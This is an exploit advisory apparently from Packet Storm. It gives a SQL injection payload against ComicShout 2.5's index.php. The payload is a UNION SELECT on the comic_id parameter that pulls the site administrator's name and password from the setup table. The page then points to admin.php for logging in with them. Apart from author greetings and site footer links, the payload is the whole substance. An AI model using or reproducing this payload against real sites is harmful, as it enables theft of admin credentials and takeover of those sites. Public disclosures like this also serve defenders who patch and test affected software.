ComicShout version 2.5 suffers from a remote SQL injection vulnerability in index.php.
552e238f194d7d3b98d6ff0c318c2fd476c3ddd97a90a94e22141bcfa22b0d0a##########################################################
#
# ComicShout Remote 2.5 SQL Injection Vulnerability
#
# by D3m0n a.k.a Niiub
#
# Home: www.bl4ck-b0x-info
#
# niiub[at]bl4ck-b0x.info
#
##########################################################
##########################################################
Exploit:
/index.php?comic_id=-1+UNION+SELECT+1,2,3,concat(site_admin,char(58),site_pass),5,6+FROM+setup/*
Admin PA:
admin.php
###########################################################
Greetz: dun - sid_psycho - Kacper
###########################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed